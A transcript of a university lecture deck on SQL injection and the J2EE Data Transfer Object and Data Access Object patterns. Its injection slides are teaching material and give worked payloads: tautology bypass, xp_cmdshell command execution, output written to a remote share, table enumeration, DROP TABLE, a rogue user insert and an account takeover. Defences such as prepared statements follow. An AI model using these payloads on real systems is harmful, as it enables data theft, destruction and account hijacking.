Presentation is loading. Please wait.

Presentation is loading. Please wait.

COMP 321 Week 5. Overview SQL Injection Core J2EE Patterns Lab 5-2 Introduction Exam Review.

Published byPeter Gregory Modified over 8 years ago

Similar presentations

Presentation on theme: "COMP 321 Week 5. Overview SQL Injection Core J2EE Patterns Lab 5-2 Introduction Exam Review."— Presentation transcript:

1 COMP 321 Week 5

2 Overview SQL Injection Core J2EE Patterns Lab 5-2 Introduction Exam Review

3 SQL Injection

4 SQL Injection (cont’d) An extremely common vulnerability in web applications Allows users to execute arbitrary SQL commands on your database!

5 SQL Injection (cont’d) Picture a website with an “I forgot my password” form that mails you your password This is a bad idea in the first place, and a sign of weak security How does this form work?

6 SQL Injection (cont’d) How does this form work? –POSTs what you enter in the email field to the server –The server looks up your account, and mails the password to you

7 SQL Injection (cont’d) The server probably looks up the account like this: SELECT fieldlist FROM table WHERE field = '$EMAIL'; SELECT fieldlist FROM table WHERE field = '$EMAIL'; If $EMAIL is not handled properly, the site is vulnerable How can we test this theory?

8 SQL Injection (cont’d) What if we enter addr@here.com’ as our address? SELECT fieldlist FROM table WHERE field = 'addr@here.com''; SELECT fieldlist FROM table WHERE field = 'addr@here.com''; Invalid SQL will cause an error

9 SQL Injection (cont’d) xp_cmdshell is an MSSQL stored procedure that allows execution of arbitrary operating system commands directly to the Windows command shell: SELECT fieldlist FROM table WHERE field = ''; exec master..xp_cmdshell 'ping 10.10.1.2'--'; SELECT fieldlist FROM table WHERE field = ''; exec master..xp_cmdshell 'ping 10.10.1.2'--';

10 SQL Injection (cont’d) sp_makewebtask will create an HTML file SELECT fieldlist FROM table WHERE field = ''; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES";--'; SELECT fieldlist FROM table WHERE field = ''; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES";--';

11 SQL Injection (cont’d) What if we enter anything’ OR ‘x’=‘x’? SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x'; SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x'; This will return all rows Results depend on implementation: 1.Your password was sent to acct@here.com acct@here.com 2.Account not found 3.Server error

12 SQL Injection (cont’d) Now we would like to know what fields are in the table We can test for field names like this: SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --'; SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --'; If email is a column we’ll see some kind of successful response Otherwise we’ll see a SQL error

13 SQL Injection (cont’d) Next, we’ll need to guess the table name: SELECT email, passwd, login_id, full_name FROM table WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --'; SELECT email, passwd, login_id, full_name FROM table WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

14 SQL Injection (cont’d) We’ve guessed the table name, but now we need to know if it's the table used in this query: SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' AND members.email IS NULL; --'; SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' AND members.email IS NULL; --'; This only works if the query is on members

15 SQL Injection (cont’d) If the database is not read-only, we can now cause damage: SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; DROP TABLE members; --'; SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; DROP TABLE members; --';

16 SQL Injection (cont’d) Dropping the table isn’t very useful We could try to create a new user: SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; INSERT INTO members ('email','passwd','login_id','full_name') VALUES ('me@here.com','pass','me','haX0r');--'; SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; INSERT INTO members ('email','passwd','login_id','full_name') VALUES ('me@here.com','pass','me','haX0r');--';

17 SQL Injection (cont’d) Adding a user may not work: 1.May not have privileges to INSERT rows 2.Fields we haven’t guessed may be required, or app may need real values in them 3.Relationships with other tables may be needed

18 SQL Injection (cont’d) It may be easier to modify an existing user if we can find one –Earlier query may have displayed an email address –Website may list contact information –Could use LIKE SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' OR full_name LIKE '%Bob%'; SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' OR full_name LIKE '%Bob%';

19 SQL Injection (cont’d) Once we have an account, we can change the email address: SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; UPDATE members SET email = 'me@here.com' WHERE email = 'bob@example.com'; SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; UPDATE members SET email = 'me@here.com' WHERE email = 'bob@example.com'; Now we can use the form to get the password!

20 Preventing SQL Injection Sanitizing Inputs –Not very effective, but if necessary: 1. Use whitelists 2. Don’t sanitize in JavaScript 3. Consider all fields

21 Preventing SQL Injection (cont’d) Restrict database permissions –Don’t give write access to users that don’t require it –Delete unused stored procedures Don’t allow users to see detailed error messages –Default error messages provide very useful information to attackers

22 Preventing SQL Injection (cont’d) Use prepared statements SELECT username FROM users WHERE email = ? SELECT username FROM users WHERE email = ?  Values are treated as data, and not interpreted as part of the SQL syntax Use stored procedures  Has a similar effect, may also improve performance

23 Core J2EE Patterns Data Transfer Object (DTO)  Used to optimize access to data maintained in an application server Data Access Object (DAO)  Used to abstract access to data storage

24 Transfer Object In an application server, data is accessed through remote interfaces, and every call is potentially over a network Applications typically read data more often than they write data The client usually requires values for more than one property of an object A Data Transfer Object is a serializable object used to encapsulate the business data so that it can be retrieved in a single call

25 Transfer Object (cont’d) Client: The client application Business Object: A session bean, entity bean, or data access object (DAO) in the application server Data Transfer Object: The serializable object used to pass data back and forth

26 Transfer Object (cont’d)

27 Updatable Transfer Objects

28 Updatable Transfer Objects (cont’d)

29 Data Access Objects Applications need to store persistent data Different SQL statements may be needed for different databases Different types of persistent storage causes even greater variation in access methods (RDBMS, OODB, flat files, etc.) Data Access Objects hide data source implementation details behind a simple interface

30 Data Access Objects (cont’d)

31

32

33 DAO – Factory Method Pattern

34 DAO – Abstract Factory Pattern

35 Data Access Objects //Abstract class DAO Factory public abstract class DAOFactory { // List of DAO types supported by the factory // List of DAO types supported by the factory public static final int CLOUDSCAPE = 1; public static final int CLOUDSCAPE = 1; public static final int ORACLE = 2; public static final int ORACLE = 2; public static final int SYBASE = 3; public static final int SYBASE = 3; // The concrete factories will have to implement these methods. // The concrete factories will have to implement these methods. public abstract CustomerDAO getCustomerDAO(); public abstract CustomerDAO getCustomerDAO(); public abstract AccountDAO getAccountDAO(); public abstract AccountDAO getAccountDAO(); public abstract OrderDAO getOrderDAO(); public abstract OrderDAO getOrderDAO(); public static DAOFactory getDAOFactory(int whichFactory) public static DAOFactory getDAOFactory(int whichFactory) { switch (whichFactory) { switch (whichFactory) { case CLOUDSCAPE: return new CloudscapeDAOFactory(); case CLOUDSCAPE: return new CloudscapeDAOFactory(); case ORACLE: return new OracleDAOFactory(); case ORACLE: return new OracleDAOFactory(); case SYBASE: return new SybaseDAOFactory(); case SYBASE: return new SybaseDAOFactory(); } }

36 Data Access Objects (cont’d) //Cloudscape concrete DAO Factory implementation public class CloudscapeDAOFactory extends DAOFactory { public static Connection createConnection() public static Connection createConnection() { // Create a connection // Create a connection } public CustomerDAO getCustomerDAO() public CustomerDAO getCustomerDAO() { return new CloudscapeCustomerDAO(); // implements CustomerDAO return new CloudscapeCustomerDAO(); // implements CustomerDAO } public AccountDAO getAccountDAO() public AccountDAO getAccountDAO() { return new CloudscapeAccountDAO(); // implements AccountDAO return new CloudscapeAccountDAO(); // implements AccountDAO } public OrderDAO getOrderDAO() public OrderDAO getOrderDAO() { return new CloudscapeOrderDAO(); // implements OrderDAO return new CloudscapeOrderDAO(); // implements OrderDAO }}

37 Data Access Objects (cont’d) //Interface that all CustomerDAOs must implement public interface CustomerDAO { public int insertCustomer(…); public int insertCustomer(…); public boolean deleteCustomer(…); public boolean deleteCustomer(…); public Customer findCustomer(…); public Customer findCustomer(…); public boolean updateCustomer(…); public boolean updateCustomer(…); public RowSet selectCustomersRS(…); public RowSet selectCustomersRS(…); public Collection selectCustomersTO(…); public Collection selectCustomersTO(…);…}

38 Data Access Objects (cont’d) //CloudscapeCustomerDAO implementation of the CustomerDAO interface. //This class can contain all Cloudscape specific code and SQL. //The client is thus shielded from knowing these implementation details. public class CloudscapeCustomerDAO implements CustomerDAO { public CloudscapeCustomerDAO() {…} public CloudscapeCustomerDAO() {…} // The following methods can use // The following methods can use // CloudscapeDAOFactory.createConnection() to get a connection // CloudscapeDAOFactory.createConnection() to get a connection public int insertCustomer(…) {…} public int insertCustomer(…) {…} public boolean deleteCustomer(…) {…} public boolean deleteCustomer(…) {…} public Customer findCustomer(…) {…} public Customer findCustomer(…) {…} public boolean updateCustomer(…) {…} public boolean updateCustomer(…) {…} public RowSet selectCustomersRS(…) {…} public RowSet selectCustomersRS(…) {…} public Collection selectCustomersTO(…) {…} public Collection selectCustomersTO(…) {…}}

39 Data Access Objects (cont’d) public class Customer implements java.io.Serializable { // member variables // member variables int CustomerNumber; int CustomerNumber; String name; String name; String streetAddress; String streetAddress; String city; String city;… // getter and setter methods... // getter and setter methods...…}

40 Data Access Objects (cont’d) DAOFactory cloudscapeFactory = DAOFactory.getDAOFactory(DAOFactory.DAOCLOUDSCAPE); DAOFactory cloudscapeFactory = DAOFactory.getDAOFactory(DAOFactory.DAOCLOUDSCAPE); CustomerDAO custDAO = cloudscapeFactory.getCustomerDAO(); CustomerDAO custDAO = cloudscapeFactory.getCustomerDAO(); int newCustNo = custDAO.insertCustomer(…); int newCustNo = custDAO.insertCustomer(…); Customer cust = custDAO.findCustomer(…); Customer cust = custDAO.findCustomer(…); cust.setAddress(…); cust.setAddress(…); cust.setEmail(…); cust.setEmail(…); custDAO.updateCustomer(cust); custDAO.updateCustomer(cust); custDAO.deleteCustomer(…); custDAO.deleteCustomer(…); // Find customers in New York // Find customers in New York Customer criteria = new Customer(); Customer criteria = new Customer(); criteria.setCity("New York"); criteria.setCity("New York"); Collection customersList = custDAO.selectCustomersTO(criteria); Collection customersList = custDAO.selectCustomersTO(criteria); // Iterate through customersList... // Iterate through customersList...

41 Lab 5-2 Introduction

42 Exam Review

43 Progress Check Due this week:  Lab 4-1 Hypersonic Setup Due next week:  Read IBM tutorials: Advanced Database Operations with JDBC Managing Database Connections with JDBC  Exam

Download ppt "COMP 321 Week 5. Overview SQL Injection Core J2EE Patterns Lab 5-2 Introduction Exam Review."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
Data Access Patterns Some of the problems with data access from OO programs: 1.Data source and OO program use different data modelling concepts 2.Decoupling.

Data Access Patterns Some of the problems with data access from OO programs: 1.Data source and OO program use different data modelling concepts 2.Decoupling.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
LCT2506 Internet 2 Further SQL Stored Procedures.

LCT2506 Internet 2 Further SQL Stored Procedures.
Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.

Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.
SQL Injection and Buffer overflow

SQL Injection and Buffer overflow
ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.

ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Computer Science 101 Web Access to Databases Overview of Web Access to Databases.

Computer Science 101 Web Access to Databases Overview of Web Access to Databases.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
DAY 21: MICROSOFT ACCESS – CHAPTER 5 MICROSOFT ACCESS – CHAPTER 6 MICROSOFT ACCESS – CHAPTER 7 Akhila Kondai October 30, 2013.

DAY 21: MICROSOFT ACCESS – CHAPTER 5 MICROSOFT ACCESS – CHAPTER 6 MICROSOFT ACCESS – CHAPTER 7 Akhila Kondai October 30, 2013.
Data Access Patterns. Motivation Most software systems require persistent data (i.e. data that persists between program executions). In general, distributing.

Data Access Patterns. Motivation Most software systems require persistent data (i.e. data that persists between program executions). In general, distributing.
{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.

{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.
Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io

Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
CSCI 6962: Server-side Design and Programming

CSCI 6962: Server-side Design and Programming
Chapter 9 Using the SqlDataSource Control. References 2206-1.aspx.

Chapter 9 Using the SqlDataSource Control. References aspx.
Session 5: Working with MySQL iNET Academy Open Source Web Development.

Session 5: Working with MySQL iNET Academy Open Source Web Development.

Similar presentations

Ads by Google